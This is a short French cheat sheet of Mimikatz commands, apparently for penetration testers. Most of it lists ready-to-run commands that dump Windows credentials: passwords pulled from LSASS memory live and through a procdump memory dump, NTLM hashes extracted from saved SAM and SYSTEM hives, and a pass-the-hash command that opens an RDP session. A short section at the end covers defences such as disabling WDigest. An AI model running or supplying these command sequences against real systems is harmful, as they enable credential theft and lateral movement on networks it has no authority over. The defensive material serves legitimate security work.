Mimikatz
Commandes utiles
Repris de https://github.com/gentilkiwi/mimikatz/wiki
Récupération mots de passe
online
privilege::debug
sekurlsa::logonpasswords
offline
Récupération d’un dump avec prodcump
.\procdump64.exe -accepteula -ma lsass.exe c:\windows\tmp\lsass.dmp
A partir d’un dump lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Récupération de hashs
online
privilege::debug
token::elevate
lsadump::sam
offline
Récupérer SAM et system:
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
Dumper les hashs avec mimikatz:
lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv
Pass the hash et RDP
privilege::debug
sekurlsa::pth /user:heidegger /domain:SHINRA-INC /ntlm:XXXXXXXXXXXXXXXX /run:"mstsc.exe /restrictedadmin"
Secrets d’authentification en mémoire
Les “logins” suivants provoquent le stockage d’information d’authenficaction en mémoire Administrative Tools and Logon Types
Trucs & astuces:
- Sous les vieilles versions de Windows il est possible d’utiliser mimilove.
- Il est possible de dumper lsass et de l’analyser offline avec mimikatz.
Compatibilité minidump
Voir sekurlsa :: minidump.
Défenses
Il existe plusieurs mécanismes pour se défendre contre les attaques utilisant Mimikatz (Plus d’informations sur ADSecurity: https://adsecurity.org/?p=559)
Désactiver wdigest
A partir de Windows 8.1 et Windows Server 2012 les mots de passes ne sont plus stockés en mémoire par défaut. De plus il est possible de faire en sorte que les mots de passe n’apparaissent pas en mémoire dans les anciennes versions de Windows. Il faut pour cela:
- Appliquer le patch KB2871997
- Modifier la clé de registre suivante pour qu’elle ait 0:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)
Références
- Unofficial Guide to Mimikatz & Command Reference - ADSecurity
- Mimikatz Overview, Defenses and Detection
- Utilisation avancée de Mimikatz
- Administrative Tools and Logon Types: Information sur la réutilisation des mots de passe